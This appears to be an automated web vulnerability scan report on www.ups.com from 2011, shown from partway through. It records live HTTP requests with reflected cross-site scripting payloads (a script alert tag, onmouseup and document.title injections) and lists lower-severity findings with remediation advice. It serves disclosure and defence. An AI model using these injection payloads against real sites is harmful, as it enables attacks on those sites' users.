GET /dropoff?loc=a%22%20onmouseup=%22javascript:document.title=1313844889729173;&localeCountry=US&WBPM_lid=homepage%252Fct1.html_pnl_loc&appid=dollaunch&userState=7662f"><script>alert(1)</script>d2c98762bff&formAction=http%253A%252F%252Fwww.ups.com%252Fdropoff&originStreet=1&originCity=1&originPostal=1&originCityHist=&originStateHist=&originPostalHist=&originCountry=US&originState= HTTP/1.1
Host: www.ups.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; com.ups.bussol.data=vf23TPwPgYctTkKVdZRxs0KK2Q72Qj2QYGN1TX8lJQlpnp6whWtw!1612118992!-1727860140!15201!-1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:09:35 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 28248


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<meta name="DCSext.pgf_Site" content="Country">
<meta name="DCSext.pCC" content="US">
<meta name="DCSex
...[SNIP]...
obalLocator/Search/?WBPM_lid=homepage%2Fct1.html_pnl_loc&originPostal=1&appid=dollaunch&localeCountry=US&country=US&originStreet=1&originCity=1&originPostalHist=&originCityHist=&originState=&userState=7662f"><script>alert(1)</script>d2c98762bff&originStateHist=&formAction=http%3A%2F%2Fwww.ups.com%2Fdropoff&loc=a" onmouseup="javascript:document.title=1313844889729173;" id="doliframe" name="doliframe" width="985" frameborder="0">
...[SNIP]...

2. Flash cross-domain policy  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ups.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ups.com

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:05:11 GMT
Server: Apache
Last-Modified: Sun, 04 Jan 2009 01:10:32 GMT
Accept-Ranges: bytes
Content-Length: 104
Vary: User-Agent
Connection: close
Content-Type: text/xml


<cross-domain-policy>
   <allow-access-from domain="*.ups.com" secure="false"/>
</cross-domain-policy>

3. Cross-domain Referer leakage  previous  next
There are 3 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


3.1. http://www.ups.com/bussol  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /bussol?loc=a%22%20onmouseup=%22javascript:document.title=1313844824642004;&viewID=categoryView&contentID=ct1_sol_cat_wireless&WT.svl=BnrMsg HTTP/1.1
Host: www.ups.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:05:11 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=FKNNTPxH2NvQ2gXF7cT2ny9wzghQvK6yNN6JnXJsWnD6Q44jmvGF!1812614967!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 18128


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<meta name="DCSext.pgf_Site" content="Country">
<meta name="DCSext.pCC" content="US">
<meta name="DCSex
...[SNIP]...
<div class="arrow-blue"><a href="http://get.adobe.com/flashplayer/">Get Adobe&reg; Flash&reg; Player</a>
...[SNIP]...
<dt><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Feedback" alt="[+] Feedback" src="/img/icn_plus_black.gif" width="9" height="9">
...[SNIP]...

3.2. http://www.ups.com/content/us/en/index.jsx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/index.jsx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/index.jsx?flash=false&WT.svl=a%27;%20document.title=%271313845337298326 HTTP/1.1
Host: www.ups.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ups.com/content/us/en/index.jsx?WT.svl=a%27;%20document.title=%271313845337298326
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; com.ups.bussol.data=vf23TPwPgYctTkKVdZRxs0KK2Q72Qj2QYGN1TX8lJQlpnp6whWtw!1612118992!-1727860140!15201!-1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:04:00 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 118777


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<meta name="DCSext.pgf_Site" content="Country">
<meta name="DCSext.pCC" content="US">
<meta name="DCSex
...[SNIP]...
<dd><a href="http://www.theupsstore.com">The UPS Store</a>
...[SNIP]...
<noscript><a href="http://www.facebook.com/ups?sk=app_174150315968755" target="new" style="text-decoration:none;" >
           
       
       <img src="/img/en/hp_710x400_dmbc_0811.jpg" width="710" height="400" alt="Like us on Facebook and learn more about the tour" border="0" >
...[SNIP]...
<div class="hero-wrapper">                        <a href="http://www.facebook.com/ups?sk=app_174150315968755" target="new&WT.ac=UPS_Homepage_UPSFacebookGoGreenDMBC_Marketing_en_us" style="text-decoration:none;" >
           
       
       <img src="/img/en/hp_710x400_dmbc_0811.jpg" width="710" height="400" alt="Like us on Facebook and learn more about the tour" border="0" >
...[SNIP]...
<div class="hero-wrapper">                        <a href="https://franchise.theupsstore.com/" target="new?WT.ac=UPS_Homepage_TUPSSFranchiseSales_Marketing_en_us" style="text-decoration:none;" >
           
       
       <img src="/img/en/hp_710x400_tupps_0811.jpg" width="710" height="400" alt="The UPS Store franchise opportunities" border="0" >
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

3.3. http://www.ups.com/dropoff  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /dropoff

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dropoff?loc=a%22%20onmouseup=%22javascript:document.title=1313844889729173;&localeCountry=US&WBPM_lid=homepage%252Fct1.html_pnl_loc&appid=dollaunch&userState=1&formAction=http%253A%252F%252Fwww.ups.com%252Fdropoff&originStreet=1&originCity=1&originPostal=1&originCityHist=&originStateHist=&originPostalHist=&originCountry=US&originState= HTTP/1.1
Host: www.ups.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; com.ups.bussol.data=vf23TPwPgYctTkKVdZRxs0KK2Q72Qj2QYGN1TX8lJQlpnp6whWtw!1612118992!-1727860140!15201!-1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:08:51 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 28206


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<meta name="DCSext.pgf_Site" content="Country">
<meta name="DCSext.pCC" content="US">
<meta name="DCSex
...[SNIP]...
<dd><a href="http://www.theupsstore.com">The UPS Store</a>
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

4. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET /bussol?loc=a%22%20onmouseup=%22javascript:document.title=1313844824642004;&viewID=categoryView&contentID=ct1_sol_cat_wireless&WT.svl=BnrMsg HTTP/1.1
Host: www.ups.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:05:11 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=FKNNTPxH2NvQ2gXF7cT2ny9wzghQvK6yNN6JnXJsWnD6Q44jmvGF!1812614967!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 18128


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<meta name="DCSext.pgf_Site" content="Country">
<meta name="DCSext.pCC" content="US">
<meta name="DCSex
...[SNIP]...

5. Private IP addresses disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/index.jsx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

Request

GET /content/us/en/index.jsx?flash=false&WT.svl=a%27;%20document.title=%271313845337298326 HTTP/1.1
Host: www.ups.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ups.com/content/us/en/index.jsx?WT.svl=a%27;%20document.title=%271313845337298326
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; com.ups.bussol.data=vf23TPwPgYctTkKVdZRxs0KK2Q72Qj2QYGN1TX8lJQlpnp6whWtw!1612118992!-1727860140!15201!-1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:04:00 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 118777


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<meta name="DCSext.pgf_Site" content="Country">
<meta name="DCSext.pCC" content="US">
<meta name="DCSex
...[SNIP]...
<script type="text/javascript" src="/assets/ql/quicklinks.js?V=10.7.1.0">
...[SNIP]...

6. Robots.txt file  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: www.ups.com

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:05:12 GMT
Server: Apache
Last-Modified: Fri, 28 Jan 2011 14:05:11 GMT
Accept-Ranges: bytes
Content-Length: 166
Vary: User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /content/us/en/preferred/lws_2.html
Disallow: /content/us/en/preferred/lws_1.html
Disallow: /content/us/en/preferred/lws_index.html
Allow: /


7. HTML does not specify charset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /modaldialog/us/en/modal_dol_notice.html

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

GET /modaldialog/us/en/modal_dol_notice.html HTTP/1.1
Host: www.ups.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://www.ups.com/dropoff?loc=a%22%20onmouseup=%22javascript:document.title=1313844889729173;&localeCountry=US&WBPM_lid=homepage%252Fct1.html_pnl_loc&appid=dollaunch&userState=1&formAction=http%253A%252F%252Fwww.ups.com%252Fdropoff&originStreet=1&originCity=1&originPostal=1&originCityHist=&originStateHist=&originPostalHist=&originCountry=US&originState=
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; com.ups.bussol.data=vf23TPwPgYctTkKVdZRxs0KK2Q72Qj2QYGN1TX8lJQlpnp6whWtw!1612118992!-1727860140!15201!-1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:09:00 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 7022
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<title>UPS Important Notice</title>

<style type="text/css">
#InqSurvey{width:auto;
   background-color:#EBEBE6;
...[SNIP]...

8. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ups.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /favicon.ico HTTP/1.1
Host: www.ups.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; com.ups.bussol.data=vf23TPwPgYctTkKVdZRxs0KK2Q72Qj2QYGN1TX8lJQlpnp6whWtw!1612118992!-1727860140!15201!-1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:06:19 GMT
Server: Apache
Last-Modified: Thu, 09 Jul 2009 19:15:08 GMT
Accept-Ranges: bytes
Content-Length: 2238
Vary: User-Agent
Content-Type: text/plain

...... ..............(... ...@.......................................B...B...B...9...B...B...........9...B...J...B...J.......B...........R...c.......Bq..1q..)i..cy..Bq..{...9...k...ky...0c.1i..1y....
...[SNIP]...

Report generated by XSS.CX at Sat Aug 20 07:12:49 GMT-06:00 2011.